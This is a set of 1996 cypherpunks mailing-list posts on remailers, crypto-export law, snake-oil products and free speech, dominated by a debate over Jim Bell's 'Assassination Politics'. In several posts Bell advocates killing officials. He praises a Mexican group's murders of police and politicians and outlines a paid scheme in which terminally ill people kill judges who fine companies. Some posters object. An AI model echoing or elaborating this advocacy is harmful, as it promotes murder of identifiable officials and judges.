Besides, if you want to weed the nut cases out of society, you let them
advocate such things in public.  Makes it  easier to cart them away before
they hurt someone.  (Unless they are in Government office.  By then, it is
too late.)
------------------------------------------------------------------------
Black Art
blackart@ctrl-alt-del.com
"The Government will mind its own business the day that Malcolm McDowell 
becomes a spokesman for Crisco."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 22 Sep 1996 03:50:55 +0800
To: cypherpunks@toad.com
Subject: Re: CIA hacked
In-Reply-To: <1oykuD14w165w@bwalk.dm.com>
Message-ID: <199609211305.OAA00455@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis <dlv@bwalk.dm.com> writes:
> > [email reply protesting spam]
>
> You are confused. The above question was e-mailed to me by one of
> Timmy May's friends. 

What you were doing was confusing... how about attributing what people
have said to you, in the standard way?  I was unsure what was going on
until you clarified here.  Instead of including all the headers in
there with just a space between your headers and the quoted headers
(which makes it hard to follow, and makes one wonder if someone is
trying a crude forgery), use standard quoting conventions:

	Joe Blogss <joe@bloggs.com> writes in private email:
	> [quoted message body]...

or similar?

> I just forward their e-mail to this mailing list. I don't read it.

Has it occured to you that most of the email you have been receiving
(and posting here) is as a result of the said same habit, and peoples
predictable misunderstanding of what you were doing?

I would suggest that if you don't want to read what people email to
you, kill file them, or delete their email, or ask them in email not
to send you email, but don't forward it here!

> If you have any comments about Timmy May's friends not knowing
> English, trying to insult people, and posting non-crypto-relevant
> political rants, address them to Timmy May and his friends.

It would seem to me that the first insults were thrown by yourself,
and that your strange habit of bouncing all the fallout to the list is
perpetuating the problem.

Could you stop doing this?  Some of us read cpunks on pay per second
phone lines, and so on.  If you are concerned about
non-crypto-relevant politcal rants, how about generating some more
signal.  I see you are posting the items with the [NEWS] tag, and
these look relevant, and useful, I read a few of them myself.

If reporting to the list is accurate, I hear you have a PhD with a
subject related to crypto, so presumably you would have ample
knowledge to contribute technical crypto related thoughts.  I'm sure
people would be interested in anything along those lines you cared to
contribute, and your reputation would benefit,

Think about it,

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McGuirk <mcguirk@indirect.com>
Date: Sun, 22 Sep 1996 07:43:59 +0800
To: cypherpunks@toad.com
Subject: Re: Where to write crypto?
In-Reply-To: <Pine.BSD/.3.91.960921130248.11397C-100000@bud.indirect.com>
Message-ID: <Pine.BSD/.3.91.960921145321.14762C-100000@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Sep 1996, Dan McGuirk wrote:
> If I want to go to a country outside the United States to write 
> cryptographic code that will be freely distributable, what's the best 
> place to go?

Or, on the other hand, is there no way that a U.S. citizen can legally do 
this?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sun, 22 Sep 1996 08:37:14 +0800
To: "Myers W. Carpenter" <cypherpunks@toad.com>
Subject: Re: Macintosh Mixmaster port...  Who's doing it?
In-Reply-To: <v03007806ae65f51d7702@[198.146.120.234]>
Message-ID: <v03007803ae6a1a6590a8@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 AM -0700 9/18/96, Myers W. Carpenter wrote:
>	Does anyone have any idea who might be attempting a Macintosh
>Mixmaster port?  I and some other people were eyeing the idea.  If you know
>who might be doing this port I would appreciate hearing from them.
>	Thanks.
>			myers

Several individuals have offered to port Mixmaster. To the best of my
knowledge, none are still working on it. As the author and a Mac user I
would be happy to answer questions, and test the system. I have no Mac
programing experience though.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@csbh.mhv.net>
Date: Sun, 22 Sep 1996 05:45:11 +0800
To: cypherpunks@toad.com
Subject: Re: ANYONES CREDIT CARD # per your request.
Message-ID: <1.5.4.16.19960921192852.2cd71ece@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 PM 9/21/96 -0500, David E. Smith wrote:
>
>According to the 800 number, you may also be removed from
>their database by sending a letter to p-trak@prod.lexis-nexis.com.
>You need to send your name and address, and probably your Citizen-
>Unit Social Insecurity Number.

   True.  You *do* have to give your Social Insecurity Number ["SIN"(tm)].
While they have discontinued publishing SIN's, they have them in their
databanks and require you to state it as their way of "verifying" that it is
the "real" you making the request to be removed.


************************************************************
Lynne L. Harrison, Esq.       |    "The key to life:
Poughkeepsie, New York        |     - Get up;
lharrison@mhv.net             |     - Survive;
http://www.dueprocess.com     |     - Go to bed."
************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 22 Sep 1996 09:19:00 +0800
To: cypherpunks@toad.com
Subject: CNET Digital Dispatch  Vol. 2 No. 38
Message-ID: <3.0b16.32.19960921155903.00c51bac@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The individual who posted the C-Net top ten missed the crypto-related parts
of that issue.  (I guess the humor section is all that people read on
C-Net...)

Here is what he missed...

>Hook up your new system to the Net, and use it to remake
>yourself. Get a virtual nose ring. Program your avatar with
>all the attributes you wish you had. On the Internet, your
>image is up to you. What will yours be? Read Editor-in-Chief
>Christopher Barr's views on online identity:
>
>http://www.cnet.com/Content/Voices/Barr/091696/index.html
>
>Maybe you're not ready to share your identity. Maybe that's
>the furthest thing from your mind. If you've got secrets to
>keep, you need to know about Pretty Good Privacy, the de
>facto encryption standard for email. Our tutorial will tell
>you how to get PGP software and how to use it:
>
>http://www.cnet.com/Content/Features/Howto/Privacy/index.html
>
>Then be sure to read our update on mover and shaker Philip
>Zimmerman, the guy who invented PGP:
>
>http://www.cnet.com/Content/Voices/Movers/zimmermann.html

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sun, 22 Sep 1996 07:32:21 +0800
To: Black Art <blackart@ctrl-alt-del.com>
Subject: Re: Going AP Shit on the Internet
In-Reply-To: <3.0b16.32.19960921133414.0069a754@www.ctrl-alt-del.com>
Message-ID: <32445A8B.2483@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Art wrote:
>
> How many "hits" would John Tesh have gotten after the Olympics?
> 
> How many "hits" would Urkel get after anyone actually watched him 
> on TV?
> 
> These powers could be used for good or evil!


Those are examples of good uses, right?


______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 09:29:40 +0800
To: unicorn@schloss.li>
Subject: Re: Assassination Politics, was Kiddie porn on the Internet
Message-ID: <199609212321.QAA07036@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:51 PM 9/17/96 -0700, Steve Schear wrote:
>>On Mon, 16 Sep 1996, Steve Schear wrote:
>>
>>> Someone wrote:
>>> We've all heard these arguments, but are they true?  Who says so, and how
>>> can they be certain? Jim's suggestion has never, to my knowledge, been
>>> tried on a consistant, large, scale.  When all conventional alternatives
>>> have been tried and fail, what have we or the starving children got to
>>> lose?
>>
>>I think "Lord of the Flies" answers this question quite well.
>
>Does it?  LOTF was fiction.  Can you identify a recent instance in which a
>non-governmental organization attempted to influence political/military
>events via a concerted AP?

As you understand, I really have to question anybody who would take an 
extraordinarily contrived work of fiction like LOTF and exrtrapolate from it 
as some sort of "answer" to AP.  However, Unicorn is sufficiently confused 
that it's not surprising that this would come from him.

While it's been well over two decades since I read it, LOTF engages in the 
artifice of separating out a handful of near-pre-adolescent boys, who don't 
seem to get along particularly well while stuck on an island after being 
shot down during a war.  (Presumably, WWII.)  It's hard to understand what 
kind of lesson we could learn from this, particularly since one person's 
opinion of what might happen should such an extraordinary and unlikely event 
occur can't be all that more significant or valuable than another.  

Or, what if such an event actually happened, and the outcome was quite 
different?  What would that say about Golding's opinions?   Or, suppose a 
similar event occurred, but instead of a dozen boys it was a co-ed college's 
students, or a few geriatrics, or a family, or a few middle-aged women, 
or...what?    What, exactly, are we learning from one specific speculation 
that Golding happened to want to commit to paper?

Unfortunately (or, perhaps _fortunately_?) I don't think we're going to hear 
from Unicorn why he thinks one particular dime novel is any more 
revelational about human behavior than any other.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 09:29:37 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: Kiddie porn on the Internet
Message-ID: <199609212321.QAA07044@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 PM 9/21/96 -0400, hallam@vesuvius.ai.mit.edu wrote:
>
>[AP drivel deleted]
>
>Go talk to someone who is a member of an organisation like the PLO or
>Hammas and pretty near the top. If you think that they would be intimidated
>for a moment by AP you have another think comming.

It depends entirely on what you mean by "intimidated."

AP would make them pretty damn useless, because instead of the typical 
Palestiniation having to depend on a few corrupt self-chosen leaders, they 
could get their revenge on an individual basis.  Who needs PLO or Hamas 
under such circumstances?   Besides, the Israelis (as well as resentful 
Palestinians) could get rid of abusive PLO or Hamas leadership using AP.


>
>If it could the US would have assasinated Saddam by now.

No, because the leadership in the US who would either choose such a system 
(or not) well understand that people who live in glass palaces shouldn't 
start throwing rocks against the enemy leadership.


> It can't because it
>is too difficult to find out where exactly a person will be. Assasination
>attempts against Castro similarly failed. 

Assassination can easily fail if you don't give the proper people the 
motivation to accomplish the task. The key to having it work out is to 
ensure that the few people who have access to the target are sufficiently 
motivated to collect the reward. Who, exactly, was given a motivation to 
kill Castro?  A few clowns in Miami?  A few crooks in Jersey?

Give _everybody_ who meets Castro during the day a $10 million motivation to 
kill him, and he'll be dead before sunset.


>If you care to look at the history of Cambodia you will see that Lon Nol
>assumed the presidency despite the knowledge that there was practically no ch
>chance of defeating the Khumer Rouge and that he would almost certainly be 
dead
>in less than a week as a result. 
>
>Both the assumption AP rests on are utterly false. It is neither possible
>to assasinate people at will nor will it intimidate. 


Since it's never been tried before, how do you know?

>In addition *ANYONE* who attempted to implement AP would be someone *I*
>would regard as a tyrant and therefore a legitimate target by the rules
>of AP. 

I don't doubt that there will be many people who misunderstand AP.  You're 
obviously one of them.

I would naturally consider it permissable to engage the support of 
>others in their suppression. Since we now live in the fantasy land of AP
>I can now wipe out anyone anywhere so I eliminate all AP leaders.
>
>
>I think that this type of talk is incredibly dangerous. There are plenty of
>people on the net who are psychos and if you spread AP drivel arround someone
>is going to act on it. Probably not Jim Bell, more likely a psychopath who
>lurks on the list but does not post. 

Pardon me, but what's wrong with this?    Follow the news more closely, and 
you'll hear of a group which is operating in southern Mexico, the "EPR," 
which is killing off government employees, politicians, and police.  True, 
they're not implementing the mathematical, digital-cash basis behind AP, but 
they see to be making good progress against the corruption which is Mexico.  
Increase their productivity by a factor of 10, and the Mexican government 
would be terrified.  Increase it by 100, and the Mexican government would 
fall within a few months.


>If you call for people to be murdered - and let us not forget that this is
>what AP is about you bear the responsibility when someone acts on it.

Does that make YOU responsible if, by calling for people to NOT kill their 
oppressors, they continue to suffer oppression?


>I consider AP to be very close to calling for the assasination of the 
>President of the USA. That is a federal crime and there is a law that 
>requires the investigation of any such threats. I suggest that people
>think *very* carefully before engaging in this dangerous nonsense any
>further. 
>
>	Phill
>PS it is not censorship to stop people from advocating murder.


Then you obviously don't understand the meaning of the word, "censorship."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Sun, 22 Sep 1996 09:49:56 +0800
To: cypherpunks@toad.com
Subject: Re: FCC's Hundt calls for univ service for Net, nixes iphone regs
Message-ID: <199609212323.QAA23452@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 20 Sep 1996, Tim May wrote:
[...]

>The Constitutional issues of free speech would remain mostly unchanged even
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^               
>if "universal access" happens, but the government would definitely get more
>of a foot in the door than it has now.

I really hope that this is the case, and that some restraint would be
exercised. But when the FCC has historically concerned itself with channels
of communication, the 1st Am has typically been tossed out of the window.
Recall the "seven dirty words" brouhaha.  

Perhaps they've lightened up.  I can imagine Herr Hundt and his FCC fellows
looking on fondly and indulgently as cute-as-a-button sitcom kids inform
their network TV show parents more frequently than we've heard "fuckhead" on
this list that they "suck."

I seem to recall somewhere in the dim dark past that the expression "you
suck" would have been subsumed under the "fighting words" statutes,
implying, as it does, that the object of the utterer's scorn was either
homosexual or a woman who casually performed fellation.

If the FCC approves of "you suck" on network television, perhaps there is
yet hope that the perverse topics daily discussed on c-punks would, at least
temporarily, be allowed.

Dave Rose
drose@azstarnet.com
____________________________________

"Take this Uzi from a crack baby's hands,
and put in a computer--that's our demands"
                                         -J. Jackson

"Cover your mouth when you sneeze,
that'll help the solution"
                                         -Mavis, Roebuck "Pops" Staples &
the family





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sun, 22 Sep 1996 09:55:31 +0800
To: stewarts@ix.netcom.com
Subject: Re: Pseudonym server: Jenaer Anonymous Service
In-Reply-To: <199609011109.NAA14105@jengate.thur.de>
Message-ID: <v03007807ae6a2b999b28@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:37 PM -0700 9/1/96, Lutz Donnerhacke wrote:
>* stewarts@ix.netcom.com wrote:
>It's strongly recomment to use a reply server to forward your requests to.
>The server sends all outgoing messages via mixmaster chains.
>(mixmaster@as-node.jena.thur.de can is always the first one in the chain).
>

This is very important. You don't want to send it your real address to
deliver to. I strongly recommend using alt.anonymous.messages.

A program called "newscan" is ideal for checking news based message pools.
It scans news on a server of your choice, and saves messages based on
criteria that you specify.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 09:57:40 +0800
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <199609212340.QAA07773@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:03 PM 9/18/96 -0700, John Gilmore wrote:
>Judge Patel to Decide if Government Restrictions on 
>Cryptography Violate the First Amendment
>San Francisco, CA -- On Friday, September 20, 1996, Judge Marilyn Hall
>Patel will hold hearings in a case with far-reaching implications for
>personal privacy, U.S. competitiveness, and national security.  Mathematician 
>Daniel J. Bernstein, a Research Assistant Professor in the Department of 
>Mathematics, Statistics and Computer Science at the University of Illinois at 
>Chicago, has sued several Federal agencies on the grounds that the 
>agencies' requirement that he obtain a license prior to publishing his 
>ideas about cryptography violates his First Amendment right to freedom 
>of speech.
[trimmed]
>LEGAL ARGUMENTS
>
>*       Any legal framework that allows a government bureaucrat to 
>censor speech before it happens is an unconstitutional prior restraint.  
>The government is not allowed to set up such a drastic scheme 
>unless they can prove that publication of such information will 
>"surely result in direct, immediate, and irreparable damage to our 
>Nation or its people" and that the regulation at issue is necessary 
>to prevent this damage. 

At the risk of being a devil's advocate, let me suggest that you are 
conceding too much even with the preceding paragraph.  The 1st amendment 
says nothing about preventing speech  which (even admittedly) would result 
in "direct, immediate, and irreparable damage to our nation or its people."

Indeed, if you follow the news over the last 5-10 years, you see numerous 
examples of news items getting publicized (sometimes 30-40 years late) which 
might arguably have cause "irreparable damage."  That recent revelation 
about the POWs being left in Korea would have been one such example.  The 
intentional detonation of that H-bomb in 1954, knowing that prevailing winds 
would shower thousands of people with fallout was another.  The US 
military's experimentation with chemical weapons on our own people after 
WWII is another.  The fraud of the Gulf of Tonkin Resolution is another.  
The Pentagon Papers incident is another.  The Tuskeegee syphillis 
experiments on blacks which ended in 1972 was another.  The massive 
pollution at decomissioned military bases.  The Iran/Contra arms smuggling 
deals, along with the cocaine smuggling stories which are more recently 
being pursued, are yet another.

I could list many more, but won't because of lack of space.  But notice 
that, presumably, each and every one of these incidents was AT ONE TIME kept 
secret, arguably because it would be better for the country to do so.  Thus, 
presumably it was thought or at least asserted that to reveal them would 
cause "damage to our nation or its people."

The way you've written the paragraph I've quoted above, it appears that you 
are somehow acknowleding that there  are certain circumstances where certain 
types of speech are controllable because they are "harmful," but you fail to 
explain how even this constitutional restiction is tolerable.    Frankly, I 
don't see it!  What you need to do is to be far more specific about such 
speech and exactly where it can be controlled.

I should point out, also, that this is the second time I've mentioned this.  
You're doing us a disservice if you concede too much in this area.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sun, 22 Sep 1996 09:59:31 +0800
To: Krenn <cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu>
Message-ID: <v03007808ae6a2dfa2a73@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


I am setting up just such a list. I plan to award products for both
excellent and lousy crypto. This really should be a committee (yuch)
effort, so if you would like to participate, please let me know.

	-Lance

At 5:01 PM -0700 9/17/96, Krenn wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>It would be nice to have a list of actual products which are deemed
>potential snake-oil. Such a list could be maintained anonymously
>through a nym to avoid all the annoying legal problems with commenting
>on another's product. Though truth is the best defense against libel
>charges, it would be very annoying to be sued or some such by some
>hairbrained snake-oil peddler.
>
>Krenn
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMj84gEnqfwPpt/QVAQEWZAP9EZ7+3dQol+ZBLYQIiEk8f8avKDje5LBh
>EmE5GVxFXDgD9wAmcccMMuVxxCaUhN0kc8Q4StQ4aZGjwdrCGouHq4aNJdd73ERP
>vuk+VpQrlUwSvwwPlfXKUIQrM1PHfNigXrS5OrsQe/H/GjLw2lFa/WI2urR2Cuqg
>oMmtuQKrJik=
>=r2wq
>-----END PGP SIGNATURE-----


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Sun, 22 Sep 1996 10:22:17 +0800
To: Mark Rogaski <krenn@nym.alias.net (Krenn)
Subject: Re: Snake-Oil FAQ
In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu>
Message-ID: <v03007809ae6a2f216fa1@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:00 AM -0700 9/18/96, Mark Rogaski wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>An entity claiming to be Krenn wrote:
>:
>: It would be nice to have a list of actual products which are deemed
>: potential snake-oil. Such a list could be maintained anonymously
>: through a nym to avoid all the annoying legal problems with commenting
>: on another's product. Though truth is the best defense against libel
>: charges, it would be very annoying to be sued or some such by some
>: hairbrained snake-oil peddler.
>:
>
>I think a blacklist of that sort is inherently bad.  I would much rather
>have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than
>just be spoon fed a list of good products vs. bad products.  Pardon the
>cliche, but if you give a man a fish ... etc, etc.
>
>mark
>

I agree in principle, but for the foreseeable future I think the list will
be a "good thing".

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 22 Sep 1996 07:28:00 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: [NOISE] Kiddie porn on the Internet
In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu>
Message-ID: <Pine.LNX.3.95.960921170914.280A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 21 Sep 1996 hallam@vesuvius.ai.mit.edu wrote:

> If you call for people to be murdered - and let us not forget that this is
> what AP is about you bear the responsibility when someone acts on it.

So much for free speech.  Do you think people distributing bomb-making material
should be held responsible for any terrorist incidents.  Quite a few people
on this list who posted bomb-making material would be arrested.  Same with
chemistry book publishers and news magazines that had some pretty detailed
information about pipe bombs.  I fail to see any difference between the
two.

> I consider AP to be very close to calling for the assasination of the 
> President of the USA. That is a federal crime and there is a law that 
> requires the investigation of any such threats. I suggest that people
> think *very* carefully before engaging in this dangerous nonsense any
> further. 

Do you really consider speech to be "dangerous."  The law requiring
investigation of threats against the president is a stupid one.  The maintainer
of the exploding head page was investigated by the USSS after putting up
computer-generated pictures of Bob Dole's head exploding (Presidential
candidates are also covered under this law).  There's too much potential for
abuse.

> PS it is not censorship to stop people from advocating murder.

Then all prosecuters pushing for the death penalty, death penalty advocates,
and anyone who advocates going to war with another country should all be
thrown in jail.  I might as well ask the common question again: "What part of
'Congress shall make no law' don't you understand?"

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkRcaizIPc7jvyFpAQFEcAgAhJr/0veZSx/nX+DNQK/mov53sJzQo8f/
dF7DOTahAII8HX0ysKfJ3qJ/bQMZBXh3e47c0WdX/Mze6/4rinBdDp2aYgc1Xnvc
wMkD3Wm+LFuYlJ0Dq3TcUddgEzOd3CYgl2IQVHVx8qs3900qF4b/HQiiGnt+k9A5
Id2k1CQW+CfuGRGB2hBaqltLOY+62qHqwocGoHKB0j5S11mBuekFxYf/JfhMRncN
MsaFOZz8HT9n/w78Lz358lU7jxsDJdpkPOJ5bD3I5BKnUuVlJlCsENkvwJtws98E
8thG++TqpeqcB8vHYZ+soj52TMeC5WEaFAcL0d5Hzf/O0gKXSs22pA==
=L3sm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Sep 1996 11:10:57 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: Re: Kiddie porn on the Internet
In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu>
Message-ID: <32448DF8.5208@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


hallam@vesuvius.ai.mit.edu wrote:
> Go talk to someone who is a member of an organisation like the PLO or
> Hammas and pretty near the top. If you think that they would be
> intimidated for a moment by AP you have another think comming.
> If it could the US would have assasinated Saddam by now. It can't
> because it is too difficult to find out where exactly a person will 
> be. Assasination
> attempts against Castro similarly failed.
> If you care to look at the history of Cambodia you will see that Lon
> Nol assumed the presidency despite the knowledge that there was
> practically no chance of defeating the Khumer Rouge and that he would 
> almost certainly be dead
> in less than a week as a result.
> Both the assumption AP rests on are utterly false. It is neither
> possible to assasinate people at will nor will it intimidate.
> In addition *ANYONE* who attempted to implement AP would be someone
> *I* would regard as a tyrant and therefore a legitimate target by the 
> rules of AP. I would naturally consider it permissable to engage the
> support of others in their suppression. Since we now live in the
> fantasy land of AP I can now wipe out anyone anywhere so I eliminate 
> all AP leaders.
> I think that this type of talk is incredibly dangerous. There are
> plenty of people on the net who are psychos and if you spread AP
> drivel arround someone is going to act on it. Probably not Jim Bell, 
> more likely a psychopath who
> lurks on the list but does not post.
> If you call for people to be murdered - and let us not forget that
> this is what AP is about you bear the responsibility when someone acts 
> on it.
> I consider AP to be very close to calling for the assasination of the
> President of the USA. That is a federal crime and there is a law that
> requires the investigation of any such threats. I suggest that people
> think *very* carefully before engaging in this dangerous nonsense any
> further.

Come now, surely you don't think putting assassination into the hands of 
the common people (Democracy, yes?  The same stuff Clinton is preaching 
all the time, remember?) is going to be worse than letting governments 
control all the action?  If you're going to allow governments to do the 
job, you and your fellow citizens should have been more involved in the 
political arena, to monitor these kinds of activities, so the government 
(of the U.S., for example) didn't have to get such a bad reputation.

A few years ago, William Torbitt (pseudonym) wrote in part: "Penal codes 
have had two historic purposes - to deter crime and reform the offender.
.....However, when the head of the National Police agency joins with a 
handful of other govt. leaders, and they both in turn throw in with 
organized crime to murder the president, and the people have an uneasy 
feeling that something of this nature has taken place, it is only 
natural that crime and violence increase, and the basic deterrent to 
crime has broken down." (quote approximate)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 11:45:18 +0800
To: Black Unicorn <dthorn@gte.net>
Subject: Re: The GAK Momentum is Building...
Message-ID: <199609220058.RAA10810@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:58 PM 9/20/96 -0400, Black Unicorn wrote:
>On Wed, 18 Sep 1996, Dale Thorn wrote:
>> My comment: Once the big Corp.'s get used to the new game, they'll put 
>> the non-critical stuff out there for Mr. Freeh, and for the really 
>> secret data, if the cops confiscate anything they can't read, the Corp. 
>> security will put it off on a fall-guy, even as high as the CEO if 
>> necessary. I just wanna see one case where a federal judge will try to 
>> bleed a big company for contempt for "refusing" to decode and hand over 
>> some ostensibly encrypted data. Matter of fact, there are probably cases 
>> similar to this that have already been through the appeals courts.
>
>Several.  Most involve foreign banks refusing to turn over records to U.S.
>courts.  Most result in powerfully large fines imposed on banks, often on
>a per diem basis.


But as usual, you ignore the obvious solution to the problem.  Let's suppose 
the amount of the fine is set at $1000 per day.  Actuarially, this works out 
to be the interest (at 5% per year) on $7.3 million dollars in principle.  
In other words, if you can eliminate the fine for less than $7.3 million, 
you're better off doing it.

Naturally, you won't even consider the possibility of going outside the 
system to solve a problem.  The rest of us notice that there are probably 
thousands of terminally-ill people who would gladly act as a human kamikaze 
and get rid of any judge inclined to impose such a fine, for a payment of 1% 
of this principle amount to a family member or loved one, leaving 99% 
available for the few other judges foolish enough to basically commit 
suicide by taking up a futile gesture.

This kind of operation is best arranged by what might be described as an 
"insurance company," which will divide the risk among client companies until 
everyone learns what the score really is.   It wouldn't take long before no 
such fines are ever imposed.

But nah, this is much too complex for you.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 22 Sep 1996 04:18:56 +0800
To: rp@rpini.com (Remo Pini)
Subject: Re: WinSock Remailer Version ALPHA 1.3 Now Available
Message-ID: <199609211811.UAA29737@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Remo Pini (rp@rpini.com) wrote:

: To: cypherpunks@toad.com
: Date: Thu Sep 19 09:07:16 1996
: Has it already been exported by some sinister anonymous? If so, where?


ftp.replay.com:/pub/replay/pub/remailer/wsa13.zip where else ...?

--
  Alex de Joode  | Replay IP Service & Web DZign  --  The Netherlands
usura@replay.com | http://www.replay.com       mailto:info@replay.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Sep 1996 14:17:29 +0800
To: jya@pipeline.com (John Young)
Subject: Re: USA_exe
Message-ID: <199609220342.UAA17509@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 AM 9/22/96 GMT, John Young wrote:
>On Sep 21, 1996 16:19:53, 'jim bell <jimbell@pacifier.com>' wrote: 
>>Pardon me, but what's wrong with this?    Follow the news more closely, and  
>>you'll hear of a group which is operating in southern Mexico, the "EPR," which  
>>is killing off government employees, politicians, and police.  True, they're  
>>not implementing the mathematical, digital-cash basis behind AP, but they
>see  
>>to be making good progress against the corruption which is Mexico.   
>>Increase their productivity by a factor of 10, and the Mexican government would  
>>be terrified.  Increase it by 100, and the Mexican government would fall within  
>>a few months. 
> 
> 
>Jim's makes a good, if gruesome, point here, about the vicious realities of
>do-or-die AP, by even our own apple pie government. 
> 
> 
